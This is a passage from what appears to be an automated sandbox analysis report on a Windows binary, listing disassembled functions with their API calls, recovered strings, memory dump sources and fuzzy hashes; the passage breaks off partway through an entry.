                                                                                          Function 005D4050 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 118COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowsDirectoryW.KERNEL32(?,00000100), ref: 005D408E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DirectoryWindows
                                                                                          • String ID: .lnk$\Profiles\All Users\Start Menu\Programs\$rb+
                                                                                          • API String ID: 3619848164-1848683015
                                                                                          • Opcode ID: 73165f98f0455afeb5c1e9d66f89532a5fbbbc99d6e1916abe91ee8aa8c68824
                                                                                          • Instruction ID: 5336ebdcb692ee57112e5693fa3034cda4f8885ab73e9f8090177b81c776da10
                                                                                          • Opcode Fuzzy Hash: 73165f98f0455afeb5c1e9d66f89532a5fbbbc99d6e1916abe91ee8aa8c68824
                                                                                          • Instruction Fuzzy Hash: C3310E31A0061A97CB34EB68DD1ABDB77A6FF84310F548196E9099B381EB715D40CBD0
                                                                                          Function 005A50F0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 109COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: DebugOutputStringwsprintf
                                                                                          • String ID: ICFConfig("%s", %d, "%s")$Undefined product
                                                                                          • API String ID: 1959131528-3451686069
                                                                                          • Opcode ID: 6a88f145d253ab7d7e1bfa53d727d1a636637739c013a3bd2c30125e81038c2b
                                                                                          • Instruction ID: 87f9101b24d0b3e25e329dea0d63f41adf9fbcf5643ddf42b4c88ef0849f4d67
                                                                                          • Opcode Fuzzy Hash: 6a88f145d253ab7d7e1bfa53d727d1a636637739c013a3bd2c30125e81038c2b
                                                                                          • Instruction Fuzzy Hash: A131BD766006049FC710DB68DC85F7E7BA6FF8A314F158158F95A9B351EA31ED01CBA0
                                                                                          Function 005C8EB0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005C8F85
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: ..\CTL32\util.cpp$nsmdir >= 0 && nsmdir < GP_MAX$psz != szTempExpanded
                                                                                          • API String ID: 237503144-2386058402
                                                                                          • Opcode ID: 89ede5f4e3dedfdca53f3ef38af04314ab71b1dbe4d9e26fbb17b8330e075080
                                                                                          • Instruction ID: aef9adc413e826378ec0fa279277e27b9492fbbd41fd7f0dbb8ccce8fb815392
                                                                                          • Opcode Fuzzy Hash: 89ede5f4e3dedfdca53f3ef38af04314ab71b1dbe4d9e26fbb17b8330e075080
                                                                                          • Instruction Fuzzy Hash: 7E31F8B59003055ADB30AFA4DC5AFFA7BB5BB84304F14915DE94493192FF70AA84C691
                                                                                          Function 005A6240 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 98registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegQueryValueExW.ADVAPI32(?,InstallLocation,00000000,00000000,?,00000400), ref: 005A629C
                                                                                          • RegQueryValueExW.ADVAPI32(?,DisplayIcon,00000000,00000000,?,00000400), ref: 005A62DA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValue
                                                                                          • String ID: DisplayIcon$InstallLocation
                                                                                          • API String ID: 3660427363-1034514769
                                                                                          • Opcode ID: 3b9ff00007ca512fe41546adc5341b6bf592ab638be1f2fc8af615da154ca911
                                                                                          • Instruction ID: f1a9fbb11e526f0badf24f4724340b18e63ee02c71e1c7aefb58c98a95cba35b
                                                                                          • Opcode Fuzzy Hash: 3b9ff00007ca512fe41546adc5341b6bf592ab638be1f2fc8af615da154ca911
                                                                                          • Instruction Fuzzy Hash: 8031D6F59002099ACF24DB54CD56FDF7778EF88704F084599E709AB181EBB06B46CB98
                                                                                          Function 005E2040 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 95libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 005E2099
                                                                                          • DeleteAce.ADVAPI32(00000104,00000000), ref: 005E2106
                                                                                          • LocalFree.KERNEL32(?), ref: 005E2124
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressDeleteFreeLocalProc
                                                                                          • String ID: GetNamedSecurityInfoW
                                                                                          • API String ID: 3891521895-3879530689
                                                                                          • Opcode ID: f718b0ee959fd2ec0d31ba9c1619066447efff4e3a33c8234101d5208cf50d14
                                                                                          • Instruction ID: 88e9d6b5506ca9e6f99180141d238dd4c52d5ba9d8c2e861dceccdf9a11d8361
                                                                                          • Opcode Fuzzy Hash: f718b0ee959fd2ec0d31ba9c1619066447efff4e3a33c8234101d5208cf50d14
                                                                                          • Instruction Fuzzy Hash: C731C571600644ABCB28DF9ACC89F9EBBEDFF84751F14841AF6859B281D6709A04CB51
                                                                                          Function 005AED00 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegCreateKeyW.ADVAPI32(?,?,?), ref: 005AED91
                                                                                          • RegDeleteKeyW.ADVAPI32(?,-00000002), ref: 005AEDA6
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AEDC5
                                                                                          Strings
                                                                                          • RegDeleteKey(%s, %s) ret %d, xrefs: 005AEDB1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateDelete
                                                                                          • String ID: RegDeleteKey(%s, %s) ret %d
                                                                                          • API String ID: 716773620-1181619153
                                                                                          • Opcode ID: 598d2650222930bc52e00695e11a77614b7546fdb70129035ec9c36b5d840eb2
                                                                                          • Instruction ID: e491ce06c125a3ce12e67e626ea56bbca7cab3694cbcd2b7623139a3b562e01d
                                                                                          • Opcode Fuzzy Hash: 598d2650222930bc52e00695e11a77614b7546fdb70129035ec9c36b5d840eb2
                                                                                          • Instruction Fuzzy Hash: 7621A7759003199BCB20DF79CC99AEB77B9FF59300F048599E91997201E6709E44CFA0
                                                                                          Function 005C31C0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProfileStringW.KERNEL32(Windows,Device,,,LPT1:,?,00000080), ref: 005C31EE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ProfileString
                                                                                          • String ID: ,,LPT1:$Device$Windows
                                                                                          • API String ID: 1468043044-2967085602
                                                                                          • Opcode ID: 946650b26269bcce07d8c1f9e8c2717fdb4ca6d386d8cee9bae8c7e9212e2bbc
                                                                                          • Instruction ID: 4598d3e36d9aa37619381b1410cf70bab2b14f1492458f9eb08ab414dd5915b9
                                                                                          • Opcode Fuzzy Hash: 946650b26269bcce07d8c1f9e8c2717fdb4ca6d386d8cee9bae8c7e9212e2bbc
                                                                                          • Instruction Fuzzy Hash: 02116DB9504205ABDB24ABA0DC56FFB7769FF94700F14406CED0597281FA71AF45C7A0
                                                                                          Function 00594530 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetStockObject.GDI32(0000000D), ref: 00594538
                                                                                          • GetObjectW.GDI32(00000000,0000005C,?), ref: 00594545
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Object$Stock
                                                                                          • String ID: Courier$Terminal
                                                                                          • API String ID: 1996491644-3811170643
                                                                                          • Opcode ID: d15289d4e5b27242f6cb8f66cfda4533fe325a59a044576361119e9c25f68c84
                                                                                          • Instruction ID: 8240934adf4b60ad9936d4bf086b798237aa30d7f677aece4c137b3043d154cc
                                                                                          • Opcode Fuzzy Hash: d15289d4e5b27242f6cb8f66cfda4533fe325a59a044576361119e9c25f68c84
                                                                                          • Instruction Fuzzy Hash: 851100321007449FDB304FAC8849BA7BFA4FF46765F044B19E5A54A2D1D370988ACB65
                                                                                          Function 005AED29 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegCreateKeyW.ADVAPI32(?,?,?), ref: 005AED91
                                                                                          • RegDeleteKeyW.ADVAPI32(?,-00000002), ref: 005AEDA6
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005AEDC5
                                                                                          Strings
                                                                                          • RegDeleteKey(%s, %s) ret %d, xrefs: 005AEDB1
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CloseCreateDelete
                                                                                          • String ID: RegDeleteKey(%s, %s) ret %d
                                                                                          • API String ID: 716773620-1181619153
                                                                                          • Opcode ID: da8d2829509caf81d5d71c878c8e7b7f1fe14753f7874e2b9bfbff0ecdf586e5
                                                                                          • Instruction ID: 79565e2f8cfd7deb4045f49937d06d772b5a09c39bf0c433dcdb2a87e7dc6367
                                                                                          • Opcode Fuzzy Hash: da8d2829509caf81d5d71c878c8e7b7f1fe14753f7874e2b9bfbff0ecdf586e5
                                                                                          • Instruction Fuzzy Hash: 8611C4759003299BCB30EB75CC5ABEBB7B9FF99300F04859DE90993202E6309D40CBA0
                                                                                          Function 005D4BF4 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 55fileCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 005D4C71
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CopyFile
                                                                                          • String ID: localmon$pcimon$pcimon.dll
                                                                                          • API String ID: 1304948518-3058681259
                                                                                          • Opcode ID: 16c8b8721dc70642570fa1ed09664391949dd12d0db7039bc9b2c0aebd5b60a3
                                                                                          • Instruction ID: 800fd97f28533b3b9b74d16a921c15e5bcbfcafc9db484e282a5eaba0f82c093
                                                                                          • Opcode Fuzzy Hash: 16c8b8721dc70642570fa1ed09664391949dd12d0db7039bc9b2c0aebd5b60a3
                                                                                          • Instruction Fuzzy Hash: F5110471A111159BDB34EB58DC5ABBD7771BB90300F54809BE54E63281EA329E81CFA1
                                                                                          Function 005B0080 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InterlockedIncrement.KERNEL32(0063B6D0), ref: 005B00BA
                                                                                          • wsprintfW.USER32 ref: 005B00E6
                                                                                          • CreateEventW.KERNEL32(?,?,?,?), ref: 005B0106
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CreateEventIncrementInterlockedwsprintf
                                                                                          • String ID: %s_L%d_%x
                                                                                          • API String ID: 608154824-3441399356
                                                                                          • Opcode ID: edf0ec061f6e5cd8ab4881a323b43cb07f97508032cce5f22251dc3ae7b8b2d4
                                                                                          • Instruction ID: 010365dcf586aa75f33fb93183fd00c4de93ca3a05e31ca54af44823a65f5643
                                                                                          • Opcode Fuzzy Hash: edf0ec061f6e5cd8ab4881a323b43cb07f97508032cce5f22251dc3ae7b8b2d4
                                                                                          • Instruction Fuzzy Hash: BB115EB5A0021DABCB10DF64DC59DEBB7B9FB88300F044199B919A3241DA70AE40CBA1
                                                                                          Function 005C6B80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetMenuItemCount.USER32(?), ref: 005C6B8C
                                                                                          • GetMenuItemInfoW.USER32(?,00000000,00000001,?), ref: 005C6BC6
                                                                                          • SetMenuItemInfoW.USER32(?,00000000,00000001,00000030), ref: 005C6BEF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: ItemMenu$Info$Count
                                                                                          • String ID: 0
                                                                                          • API String ID: 4286743509-4108050209
                                                                                          • Opcode ID: d937a3db3ac73586dfa87e2c508650a15fc4cb0e3a4be7b3fe996c6f65f6625e
                                                                                          • Instruction ID: 9e1648e9df8f073f9c88fe687f36df1e1a5cc40a9dd5a20e84491947b1304124
                                                                                          • Opcode Fuzzy Hash: d937a3db3ac73586dfa87e2c508650a15fc4cb0e3a4be7b3fe996c6f65f6625e
                                                                                          • Instruction Fuzzy Hash: 34016DB1901218BBDB10EF99EC89FDEBBBDBB49758F104019F904E6140E7B09A04C7B1
                                                                                          Function 005DAF26 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53registryprocesssynchronizationCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegQueryValueExW.ADVAPI32(?,UninstallString,00000000,?,?,?), ref: 005DAF5D
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005DAF68
                                                                                            • Part of subcall function 005DF5E0: LoadStringW.USER32(00590000,000003F9,?,00000100), ref: 005DF60A
                                                                                            • Part of subcall function 005DF5E0: wvsprintfW.USER32(?,?,00000000), ref: 005DF622
                                                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 005DAFE2
                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 005DB01C
                                                                                          • CloseHandle.KERNEL32(?), ref: 005DB02F
                                                                                          • CloseHandle.KERNEL32(?), ref: 005DB038
                                                                                          • RegOpenKeyW.ADVAPI32(80000002,?,?), ref: 005DB04D
                                                                                          • RegDeleteKeyW.ADVAPI32(80000002,?), ref: 005DB07D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Close$Handle$CreateDeleteLoadObjectOpenProcessQuerySingleStringValueWaitwvsprintf
                                                                                          • String ID: UninstallString
                                                                                          • API String ID: 736679967-1433857529
                                                                                          • Opcode ID: 6e609fa9ff1500bf5f8c0b8166dd67d67dd19d89af5f8f5a45c24d5ce1feeeed
                                                                                          • Instruction ID: 383a18b4251fabd380426073ad8831730b3db2cda6a5ae50cdf21507be40b2c9
                                                                                          • Opcode Fuzzy Hash: 6e609fa9ff1500bf5f8c0b8166dd67d67dd19d89af5f8f5a45c24d5ce1feeeed
                                                                                          • Instruction Fuzzy Hash: 8B01E57590011A9BEB30DB58CC4DBEB77A9FB44304F04428BA51D97251DA709F408B51
                                                                                          Function 005C6990 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(user32.dll), ref: 005C69D0
                                                                                          • GetProcAddress.KERNEL32(00000000,SetGestureConfig), ref: 005C69E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: SetGestureConfig$user32.dll
                                                                                          • API String ID: 2574300362-2478114855
                                                                                          • Opcode ID: 71eae405f5a3f1d5528bd93bdcbd3e727cc9f2e879d27bd2869392a8ad9cceec
                                                                                          • Instruction ID: 660b0bb0f97e4072fdc092c05cd3979da34e665a8c7a59eb4d5c6d3eec632464
                                                                                          • Opcode Fuzzy Hash: 71eae405f5a3f1d5528bd93bdcbd3e727cc9f2e879d27bd2869392a8ad9cceec
                                                                                          • Instruction Fuzzy Hash: AC11A170E00209EAEF10DFA5C849BEE7BB8EB04704F40805DE815A7281DBB55A048B95
                                                                                          Function 005D4720 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,0000042C), ref: 005D472F
                                                                                            • Part of subcall function 005D3B00: SetWindowLongW.USER32(?,000000FC,?), ref: 005D3B0D
                                                                                            • Part of subcall function 005E7CA4: RtlAllocateHeap.NTDLL(00000000,00000001,00000000,?,752F55F0,?,005B97EE,00000000,?,?), ref: 005E7CE9
                                                                                          • SendMessageW.USER32(00000000,0000000C,00000000,00000000), ref: 005D4798
                                                                                          Strings
                                                                                          Memory Dump Source
